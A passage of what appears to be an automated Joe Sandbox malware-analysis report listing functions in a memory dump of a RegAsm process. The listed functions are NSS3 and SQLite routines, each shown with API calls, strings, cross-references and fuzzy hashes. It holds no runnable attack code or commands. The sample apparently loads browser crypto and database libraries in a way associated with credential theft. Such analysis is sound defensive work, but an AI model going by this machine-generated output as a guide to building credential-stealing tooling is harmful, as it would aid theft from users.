CloseHandle.KERNEL32(?,?,6C20CF46,?,6C0DCDBD,?,6C20BF31,?,?,?,?,?,?,?,?,?), ref: 6C0EB100
sqlite3_free.NSS3(?,?,00000002,?,6C20CF46,?,6C0DCDBD,?,6C20BF31,?,?,?,?,?,?,?), ref: 6C0EB115
sqlite3_free.NSS3(?,?,?,?,?,?,6C20CF46,?,6C0DCDBD,?,6C20BF31), ref: 6C0EB12D

Part of subcall function 6C0D9EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6C0EC6FD,?,?,?,?,6C13F965,00000000), ref: 6C0D9F0E
Part of subcall function 6C0D9EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C13F965,00000000), ref: 6C0D9F5D

Strings

`&l, xrefs: 6C0EB0DF

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
String ID: `&l
API String ID: 3155957115-486499119
Opcode ID: 4c57c5fe2bd807526d2b78e54a00c0c2209e59ca39100a2ce81de75552728264
Instruction ID: b711bc875d035fd960771e87046f3ec22b0436679272c7e56b119b0af88afaa4
Opcode Fuzzy Hash: 4c57c5fe2bd807526d2b78e54a00c0c2209e59ca39100a2ce81de75552728264
Instruction Fuzzy Hash: 7191BFB0A443068FDB14CF65D894B6BBBF1BF49308F244A2DE81697A90EB31F841CB55

Function 6C180EC0 Relevance: 16.7, APIs: 11, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

PK11_PubDeriveWithKDF.NSS3 ref: 6C180F8D
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C180FB3
PR_SetError.NSS3(FFFFE00E,00000000), ref: 6C181006
PK11_FreeSymKey.NSS3(?), ref: 6C18101C
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C181033
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C18103F
PK11_FreeSymKey.NSS3(00000000), ref: 6C181048
memcpy.VCRUNTIME140(?,?,?), ref: 6C18108E
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C1810BB
memcpy.VCRUNTIME140(?,00000006,?), ref: 6C1810D6
memcpy.VCRUNTIME140(?,?,?), ref: 6C18112E

Part of subcall function 6C181570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6C1808C4,?,?), ref: 6C1815B8
Part of subcall function 6C181570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6C1808C4,?,?), ref: 6C1815C1
Part of subcall function 6C181570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C18162E
Part of subcall function 6C181570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C181637

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
String ID:
API String ID: 1510409361-0
Opcode ID: 69a2a728a5fe35696c7d40e4989c7ec6a41d1c7ff47db55c63553c9ab9f7031e
Instruction ID: 4fe681d29b8086ece6af899a01861cbc3181b0a91234e9b5e72cccc2a4a1a2fe
Opcode Fuzzy Hash: 69a2a728a5fe35696c7d40e4989c7ec6a41d1c7ff47db55c63553c9ab9f7031e
Instruction Fuzzy Hash: 7D71D2B6E092058FDB00CFA5CC84AAAB7F4BF44318F24862CE92997B11E771D955CB91

Function 6C1A1CE0 Relevance: 16.2, APIs: 5, Strings: 4, Instructions: 401COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000020), ref: 6C1A1F19
memcpy.VCRUNTIME140(?,?,00000020), ref: 6C1A2166
memcpy.VCRUNTIME140(?,?,00000010), ref: 6C1A228F
memcpy.VCRUNTIME140(?,?,00000010), ref: 6C1A23B8
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C1A241C

Strings

model, xrefs: 6C1A23CB, 6C1A23EC
serial, xrefs: 6C1A22A2
manufacturer, xrefs: 6C1A2179
token, xrefs: 6C1A1F2C

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: memcpy$Error
String ID: manufacturer$model$serial$token
API String ID: 3204416626-1906384322
Opcode ID: 5716bb444b6b19a55f5a1de644ed9cfd251436409c26e717b5cc2ef72f9a4e74
Instruction ID: 7f28832862b2f65cf24e6d334629b547777faf9939ed27b70cf2f5d81d30cd2c
Opcode Fuzzy Hash: 5716bb444b6b19a55f5a1de644ed9cfd251436409c26e717b5cc2ef72f9a4e74
Instruction Fuzzy Hash: AC021366D0C7C85EF73187B2C44C3D77AE09B56328F1C16AEDADE46AC3C3A8558A8351

Function 6C1A6C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C151C6F,00000000,00000004,?,?), ref: 6C1A6C3F

Part of subcall function 6C1FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C1FC2BF

PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C151C6F,00000000,00000004,?,?), ref: 6C1A6C60
PR_ExplodeTime.NSS3(00000000,6C151C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C151C6F,00000000,00000004,?,?), ref: 6C1A6C94

Strings

gfff, xrefs: 6C1A6CF5
gfff, xrefs: 6C1A6CFD
gfff, xrefs: 6C1A6D30
gfff, xrefs: 6C1A6D9C
gfff, xrefs: 6C1A6D66

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Alloc_ArenaErrorExplodeTimeUtilValue
String ID: gfff$gfff$gfff$gfff$gfff
API String ID: 3534712800-180463219
Opcode ID: 931292a53c89f7825d7052a70e6c6c9688c0edd5c0d2e8349b1a2af30603cbf6
Instruction ID: 3a6d8cef7a2dfccbe5ef4d35614533eb4aec28a676b070ea5d3c03cadb6b3644
Opcode Fuzzy Hash: 931292a53c89f7825d7052a70e6c6c9688c0edd5c0d2e8349b1a2af30603cbf6
Instruction Fuzzy Hash: BF514C76B016494FC708CDADDC527DAB7DA9BA4310F48C23AE841DB785D638D907C751

Function 6C220F20 Relevance: 15.4, APIs: 3, Strings: 7, Instructions: 394stringCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,-00000001), ref: 6C221027
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C2210B2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C221353

Strings

'%.*q', xrefs: 6C221217, 6C221292
-- , xrefs: 6C220FF5
NULL, xrefs: 6C22119E
$, xrefs: 6C2212A0
zeroblob(%d), xrefs: 6C221223
%02x, xrefs: 6C2212F6
%lld, xrefs: 6C22114B

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: memcpy$strlen
String ID: $$%02x$%lld$'%.*q'$-- $NULL$zeroblob(%d)
API String ID: 2619041689-2155869073
Opcode ID: b5ef070bd0e462564a3979f76ceaa419581c260823c0baebf14704d0e51a62f8
Instruction ID: cf83c265b65cd436c3fef89a993ada2adf22c996e906174ff0c7c31552d98ef5
Opcode Fuzzy Hash: b5ef070bd0e462564a3979f76ceaa419581c260823c0baebf14704d0e51a62f8
Instruction Fuzzy Hash: 1EE1AD71A083899FD714CF18C480A6BBBF1AF85348F14892CFD8587B51DB76E989CB42

Function 6C228FB0 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 289COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C228FEE
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C2290DC
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C229118
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C22915C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C2291C2
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C229209

Strings

UUUU, xrefs: 6C229255
3333, xrefs: 6C22925E

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: _byteswap_ulong$Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: 3333$UUUU
API String ID: 1967222509-2679824526
Opcode ID: d816a4030f1427f2ebd7a056d6043da876483ead87b235b5f7546cbd2e224815
Instruction ID: 2548ab9933739ea2621ef93364918f73baac49c0bad1f29d934cae266ce08cc1
Opcode Fuzzy Hash: d816a4030f1427f2ebd7a056d6043da876483ead87b235b5f7546cbd2e224815
Instruction Fuzzy Hash: F0A1A372E001199BDB04DB69CC90B9EB7B5BF48324F094129ED05A7751EB3AED51CBA0

Function 6C1BBD30 Relevance: 13.6, APIs: 9, Instructions: 102COMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6C1BBD48
NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6C1BBD68
NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6C1BBD83
NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6C1BBD9E
NSS_GetAlgorithmPolicy.NSS3(0000000A,?), ref: 6C1BBDB9
NSS_GetAlgorithmPolicy.NSS3(00000007,?), ref: 6C1BBDD0
NSS_GetAlgorithmPolicy.NSS3(000000B8,?), ref: 6C1BBDEA
NSS_GetAlgorithmPolicy.NSS3(000000BA,?), ref: 6C1BBE04
NSS_GetAlgorithmPolicy.NSS3(000000BC,?), ref: 6C1BBE1E

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: AlgorithmPolicy
String ID:
API String ID: 2721248240-0
Opcode ID: e4d910955530056187d1202f2dbb5b3aff5609503d77b88c67408105064e234e
Instruction ID: 659e9bea5e4823f52218c58148e8463787a07628144e94b4bcd3e6a97722db01
Opcode Fuzzy Hash: e4d910955530056187d1202f2dbb5b3aff5609503d77b88c67408105064e234e
Instruction Fuzzy Hash: 4F2182B6E0429957FB0186579DC3F8B32749BA174DF080128F91AFEE41E734D418CEA6

Function 6C268D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C2B14E4,6C21CC70), ref: 6C268D47
PR_GetCurrentThread.NSS3 ref: 6C268D98

Part of subcall function 6C140F00: PR_GetPageSize.NSS3(6C140936,FFFFE8AE,?,6C0D16B7,00000000,?,6C140936,00000000,?,6C0D204A), ref: 6C140F1B
Part of subcall function 6C140F00: PR_NewLogModule.NSS3(clock,6C140936,FFFFE8AE,?,6C0D16B7,00000000,?,6C140936,00000000,?,6C0D204A), ref: 6C140F25

PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6C268E7B
htons.WSOCK32(?), ref: 6C268EDB
PR_GetCurrentThread.NSS3 ref: 6C268F99
PR_GetCurrentThread.NSS3 ref: 6C26910A

Strings

%u.%u.%u.%u, xrefs: 6C268E74

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
String ID: %u.%u.%u.%u
API String ID: 1845059423-1542503432
Opcode ID: e2be04bfd2168cba73105906125ebda16b690160107a485e8c593a9b5378b48b
Instruction ID: 471ea329117ac3792631eec89466a00244b63f1ceb7f842bc06fd86a43ce4609
Opcode Fuzzy Hash: e2be04bfd2168cba73105906125ebda16b690160107a485e8c593a9b5378b48b
Instruction Fuzzy Hash: 8902CE3190529A8FDB14CF1EC458766BBB2EF43304F29829AEC915BE91CB31D985C7B0

Function 6C0EEFB0 Relevance: 12.1, Strings: 9, Instructions: 815COMMON

Download Yara Rule

Strings

not authorized, xrefs: 6C0EF957, 6C0EF9BA
%s %T already exists, xrefs: 6C0EFAC8
view, xrefs: 6C0EF061, 6C0EF071, 6C0EFAB7
table, xrefs: 6C0EF05C, 6C0EFABC, 6C0EFAC7
sqlite_temp_master, xrefs: 6C0EF0A6, 6C0EF2D5
sqlite_master, xrefs: 6C0EF0AB, 6C0EF2DA, 6C0EF757, 6C0EF93E
authorizer malfunction, xrefs: 6C0EF95C, 6C0EF9BF, 6C0EFA5E, 6C0EFA8B
there is already an index named %s, xrefs: 6C0EF9D7
temporary table name must be unqualified, xrefs: 6C0EF734

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: %s %T already exists$authorizer malfunction$not authorized$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view
API String ID: 3168844106-1126224928
Opcode ID: d8ddfc690b3e84114493575905a69d52c50913c4b2f7ffd5fc29b3da05868ead
Instruction ID: 23c06b8266d31bbdab375bb0055c233179736eacf75813d9c2b4e803f5ea0a05
Opcode Fuzzy Hash: d8ddfc690b3e84114493575905a69d52c50913c4b2f7ffd5fc29b3da05868ead
Instruction Fuzzy Hash: CC72C070E442058FDB14CF28D480BAABBF5BF8D308F1581ADD9149BB92D776E846CB90

Function 6C209C40 Relevance: 11.1, APIs: 3, Strings: 3, Instructions: 565COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(?,00000000,6C0DC52B), ref: 6C209D53
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014960,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C20A035
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000149AD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C20A114

Strings

%s at line %d of [%.10s], xrefs: 6C20A02E, 6C20A10D
database corruption, xrefs: 6C20A029, 6C20A108
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C20A01F, 6C20A0E4, 6C20A0FE

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: sqlite3_log$memcmp
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 717804543-598938438
Opcode ID: 0088b0370302e18431473c69152f3a5a4654f41f872699f1b8378128795c9dba
Instruction ID: 5d287f4982e632e945da7db13ca00a22fd185b1df8a7a00b80353b3cc9e2e95c
Opcode Fuzzy Hash: 0088b0370302e18431473c69152f3a5a4654f41f872699f1b8378128795c9dba
Instruction Fuzzy Hash: 5222AC71708349DFC704DF29C490A2AB7E1BF8A345F548A2EF8DA97A51D731E849CB42

Function 6C26CDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C26D086
PR_Malloc.NSS3(00000001), ref: 6C26D0B9
PR_Free.NSS3(?), ref: 6C26D138

Strings

>, xrefs: 6C26CF5B

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: FreeMallocstrlen
String ID: >
API String ID: 1782319670-325317158
Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction ID: 55a99c67b91e41e3d919b866fb5de3d19535633a3b54d9b1a5b1d5f9af61803d
Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction Fuzzy Hash: A0D15862B5164F0BEF14587F88A03EA77938782374F780365ED618BFE5E65988C38361

Function 6C0EAC60 Relevance: 6.4, Strings: 5, Instructions: 181COMMON

Download Yara Rule

Strings

winUnlock, xrefs: 6C0EAE18
P&l, xrefs: 6C0EADDB, 6C0EADF5, 6C0EAE6A
0&l, xrefs: 6C0EACC0, 6C0EAD22, 6C0EAD5E, 6C0EAE45
p&l, xrefs: 6C0EADA7
winUnlockReadLock, xrefs: 6C0EAE9F

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID:
String ID: 0&l$P&l$p&l$winUnlock$winUnlockReadLock
API String ID: 0-857085598
Opcode ID: b242122d8cc5263862a92a78e8d57c525d5b3df7a1558517ce55b53030c25414
Instruction ID: 57b76e718f94cdbaeac4da62f161a7e6c4fd97ed8f8e8242aa4dd45ba596d288
Opcode Fuzzy Hash: b242122d8cc5263862a92a78e8d57c525d5b3df7a1558517ce55b53030c25414
Instruction Fuzzy Hash: 31717E716082449FDB04CF28E894AAABBF5FF8D314F14CA18ED5997351D730A986CBD1

Function 6C20AD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9c1fb7d13173f35cab38c394835a260055f8e4406d9659d0fa8934daf749c18
Instruction ID: d5c4096a15e0670b630d3dd4b51afedb39efa33e32a1ee8cb74bdb8e23266210
Opcode Fuzzy Hash: e9c1fb7d13173f35cab38c394835a260055f8e4406d9659d0fa8934daf749c18
Instruction Fuzzy Hash: 66F1F471F0112A8FDB14CFA9D8587AE77F0AB4A309F15422ADD05E7784EB749992CBC0

Function 6C0E4DB0 Relevance: 5.3, Strings: 4, Instructions: 318COMMON

Download Yara Rule

Strings

P&l, xrefs: 6C0E5019, 6C0E50FA, 6C0E5157, 6C0E51DE, 6C0E51F2, 6C0E520D, 6C0E5220, 6C0E52A2, 6C0E52B5
0&l, xrefs: 6C0E4EDE, 6C0E4F82
p&l, xrefs: 6C0E4E1C, 6C0E4E81, 6C0E4FDE, 6C0E5047, 6C0E50BB, 6C0E51A3, 6C0E526C
winUnlockReadLock, xrefs: 6C0E5125

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID:
String ID: 0&l$P&l$p&l$winUnlockReadLock
API String ID: 0-4110039781
Opcode ID: c4fb92c38dbb540183fd3eb5f888f41ed4c1117fea951402b35a880e043d96f5
Instruction ID: e2574d00ceb28c221b05fdbf59f6bd5942e6a562ccbf552bc4a52ada9555ceee
Opcode Fuzzy Hash: c4fb92c38dbb540183fd3eb5f888f41ed4c1117fea951402b35a880e043d96f5
Instruction Fuzzy Hash: A0E12C70A093449FDB04DF68D49875ABBF0BF89708F158A1DEC9997391E730A985CF82

